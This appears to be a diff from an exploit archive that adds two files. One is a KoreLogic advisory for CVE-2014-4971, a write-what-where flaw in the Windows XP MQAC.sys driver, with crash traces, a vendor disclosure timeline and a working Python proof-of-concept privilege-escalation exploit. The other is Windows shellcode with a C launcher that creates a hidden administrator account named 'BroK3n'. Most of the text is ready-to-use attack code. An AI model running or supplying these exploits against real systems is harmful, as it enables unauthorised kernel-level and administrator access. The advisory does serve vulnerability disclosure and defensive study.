MQAC.sys Arbitrary Write Privilege Escalation +Advisory ID: KL-001-2014-003 +Publication Date: 2014.07.18 +Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt + + +1. Vulnerability Details + + Affected Vendor: Microsoft + Affected Product: MQ Access Control + Affected Versions: 5.1.0.1110 + Platform: Microsoft Windows XP SP3 + CWE Classification: CWE-123: Write-what-where Condition + Impact: Privilege Escalation + Attack vector: IOCTL + CVE ID: CVE-2014-4971 + +2. Vulnerability Description + + A vulnerability within the MQAC module allows an attacker to + inject memory they control into an arbitrary location they + define. This can be used by an attacker to overwrite + HalDispatchTable+0x4 and execute arbitrary code by subsequently + calling NtQueryIntervalProfile. + +3. Technical Description + + A userland process can create a handle into the MQAC device and + subsequently make DeviceIoControlFile() calls into that device. + During the IRP handler routine for 0x1965020f the user provided + OutputBuffer address is not validated. This allows an attacker + to specify an arbitrary address and write (or overwrite) the + memory residing at the specified address. This is classically + known as a write-what-where vulnerability and has well known + exploitation methods associated with it. + + A stack trace from our fuzzing can be seen below. In our + fuzzing testcase, the specified OutputBuffer in the + DeviceIoControlFile() call is 0xffff0000. + +STACK_TEXT: +b1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b +b1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 +b1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc +b1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d +b1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d +b1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31 +b1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70 +b1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7 +b1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a + + Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' + command shows the fault originating in the mqac driver. + +OLLOWUP_IP: +mqac!AC2QM+5d +b230af37 891e mov dword ptr [esi],ebx + + Reviewing the TRAP_FRAME at the time of crash we can see + IopCompleteRequest() copying data from InputBuffer into the + OutputBuffer. InputBuffer is another parameter provided to the + DeviceIoControlFile() function and is therefore controllable by + the attacker. The edi register contains the invalid address + provided during the fuzz testcase. + +TRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4) +ErrCode = 00000002 +eax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000 +eip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +mqac!AC2QM+0x5d: +b230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=???????? + + A write-what-where vulnerability can be leveraged to obtain + escalated privileges. To do so, an attacker will need to + allocate memory in userland that is populated with shellcode + designed to find the Token for PID 4 (System) and then overwrite + the token for its own process. By leveraging the vulnerability + in MQAC it is then possible to overwrite the pointer at + HalDispatchTable+0x4 with a pointer to our shellcode. Calling + NtQueryIntervalProfile() will subsequently call + HalDispatchTable+0x4, execute our shellcode, and elevate the + privilege of the exploit process. + +4. Mitigation and Remediation Recommendation + + None. A patch is not likely to be forthcoming from the vendor. + +5. Credit + + This vulnerability was discovered by Matt Bergin of KoreLogic + Security, Inc. + +6. Disclosure Timeline + + 2014.04.28 - Initial contact; sent Microsoft report and PoC. + 2014.04.28 - Microsoft acknowledges receipt of vulnerability + report; states XP is no longer supported and asks if + the vulnerability affects other versions of Windows. + 2014.04.29 - KoreLogic asks Microsoft for clarification of their + support policy for XP. + 2014.04.29 - Microsoft says XP-only vulnerabilities will not be + addressed with patches. + 2014.04.29 - KoreLogic asks if Microsoft intends to address the + vulnerability report. + 2014.04.29 - Microsoft opens case to investigate the impact of the + vulnerability on non-XP systems. + 2014.05.06 - Microsoft asks again if this vulnerability affects + non-XP systems. + 2014.05.14 - KoreLogic informs Microsoft that the vulnerability + report is for XP and other Windows versions have + not been examined. + 2014.06.11 - KoreLogic informs Microsoft that 30 business days + have passed since vendor acknowledgement of the + initial report. KoreLogic requests CVE number for the + vulnerability, if there is one. KoreLogic also + requests vendor's public identifier for the + vulnerability along with the expected disclosure date. + 2014.06.11 - Microsoft responds to KoreLogic that the + vulnerability does not affect an "up-platform" + product. Says they are investigating embedded + platforms. Does not provide a CVE number or a + disclosure date. + 2014.06.30 - KoreLogic asks Microsoft for confirmation of their + receipt of the updated PoC. Also requests that + a CVE ID be issued to this vulnerability. + 2014.07.02 - 45 business days have elapsed since Microsoft + acknowledged receipt of the vulnerability report and + PoC. + 2014.07.07 - KoreLogic requests CVE from MITRE. + 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to + be identical to KL-001-2014-002 and issues + CVE-2014-4971 for both vulnerabilities. + 2014.07.18 - Public disclosure. + +7. Proof of Concept + + #!/usr/bin/python2 + # + # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation + # Matt Bergin (KoreLogic / Smash the Stack) + # CVE-2014-4971 + # + from ctypes import * + from struct import pack + from os import getpid,system + from sys import exit + EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA + GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle + INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 + + # thanks to offsec for the concept + # I re-wrote the code as to not fully insult them :) + def getBase(name=None): + retArray = c_ulong*1024 + ImageBase = retArray() + callback = c_int(1024) + cbNeeded = c_long() + EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) + for base in ImageBase: + driverName = c_char_p("\x00"*1024) + GetDeviceDriverBaseNameA(base,driverName,48) + if (name): + if (driverName.value.lower() == name): + return base + else: + return (base,driverName.value) + return None + + handle = CreateFileA("\\\\.\\MQAC",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) + print "[+] Handle \\\\.\\MQAC @ %s" % (handle) + NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) + buf = "\x50\x00\x00\x00"+"\x90"*0x400 + WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0))) + WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) + WriteProcessMemory(-1, 0x5000, "\xcc", 77, byref(c_int(0))) + #Overwrite Pointer + kBase,kVer = getBase() + hKernel = LoadLibraryExA(kVer,0,1) + HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable") + HalDispatchTable -= hKernel + HalDispatchTable += kBase + HalDispatchTable += 0x4 + print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable)) + DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0) + print "[+] HalDispatchTable+0x4 overwritten" + CloseHandle(handle) + NtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) + exit(0) + +The contents of this advisory are copyright(c) 2014 +KoreLogic, Inc. and are licensed under a Creative Commons +Attribution Share-Alike 4.0 (United States) License: +http://creativecommons.org/licenses/by-sa/4.0/ + +KoreLogic, Inc. is a founder-owned and operated company with a +proven track record of providing security services to entities +ranging from Fortune 500 to small and mid-sized companies. We +are a highly skilled team of senior security consultants doing +by-hand security assessments for the most important networks in +the U.S. and around the world. We are also developers of various +tools and resources aimed at helping the security community. +https://www.korelogic.com/about-korelogic.html + +Our public vulnerability disclosure policy is available at: +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \ No newline at end of file diff --git a/platforms/windows/shellcode/33836.txt b/platforms/windows/shellcode/33836.txt new file mode 100755 index 000000000..2936c7e19 --- /dev/null +++ b/platforms/windows/shellcode/33836.txt @@ -0,0 +1,27 @@ +Add Admin User Shellcode (194 bytes) - Any Windows Version +======================================================== + +Title: Add Admin User Shellcode (194 bytes) - Any Windows Version +Release date: 21/06/2014 +Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) +Size: 194 byte (NULL free) +Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 +Username: BroK3n +Password: BroK3n + +char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" + "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" + "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" + "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" + "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" + "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" + "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" + "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" + "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" + "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" + "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" + "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" + "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; + + +int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();} \ No newline at end of file